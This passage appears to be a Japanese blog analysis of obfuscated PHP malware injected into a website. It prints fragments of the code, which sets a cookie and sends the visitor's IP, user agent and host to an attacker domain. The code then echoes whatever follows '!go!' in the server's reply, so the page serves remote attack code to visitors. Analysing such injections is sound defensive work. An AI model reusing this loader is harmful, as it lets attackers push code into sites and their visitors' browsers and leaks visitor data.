@setcookie($evalamSEiYUdCgdSW,md5(evalMNhPOlTagIOfBSF("c3RhdHM=")),time()+10800); //「stats」という名前でCookieをセット。
$evalsssgqulVBTkZLAch = evalWEMBIkqYOIIGcLBn($evalTWeirVaqVW.evalMNhPOlTagIOfBSF("Og==").evalMNhPOlTagIOfBSF("Ly8=").$evalgKgHOXrDzX.evalMNhPOlTagIOfBSF("Lw==").$evalBdUbtGUDXfB.evalMNhPOlTagIOfBSF("LnBo").evalMNhPOlTagIOfBSF("cD8=").evalMNhPOlTagIOfBSF("aT0=").$_SERVER[evalMNhPOlTagIOfBSF("UkVNT1RFX0FERFI=")].evalMNhPOlTagIOfBSF("JmI9").urlencode($evalrMsivpMgcfC).evalMNhPOlTagIOfBSF("Jmg9").urlencode($_SERVER[evalMNhPOlTagIOfBSF("SFRUUF9IT1NU")]));
これを解析すると http://f528764d624db129b32c21fbca0cb8d6.com/in.php?i=&b=&h= が返ってくる。
これをブラウザからアクセスすると
http://f528764d624db129b32c21fbca0cb8d6.com/in.php?i=210.224.***.***&b=Mozilla%2F5.0+%28Macintosh%3B+Intel+Mac+OS+X+10_7_2%29+AppleWebKit%2F535.7+%28KHTML%2C+like+Gecko%29+Chrome%2F16.0.912.75+Safari%2F535.7&h=isidai.sakura.ne.jp となる。(IPアドレスは伏せました)
これを file_get_contents している。
if ( strstr($evalsssgqulVBTkZLAch,$evalQwblCenFzUe)){ // strstr(,'!go!')
おそらく攻撃者のサーバが !go! の含んだレスポンスを返すと攻撃が実行される。
$evalsssgqulVBTkZLAch = explode($evalQwblCenFzUe,$evalsssgqulVBTkZLAch); $evalsssgqulVBTkZLAch = $evalsssgqulVBTkZLAch[1];
攻撃者サーバが返してくるレスポンス内容の!go!から後ろ側のコードが代入される。
echo $evalsssgqulVBTkZLAch;
上記で代入された攻撃コードがブラウザに出力され攻撃が行われる。
} }
ということで、複雑に難読されたコードもやってることはfile_get_contentsで攻撃コードを取りに行って出力…というものでした。検索ボット避けがしてあったりもしましたが、基本はシンプルな攻撃ですね。
マジ疲れたOTL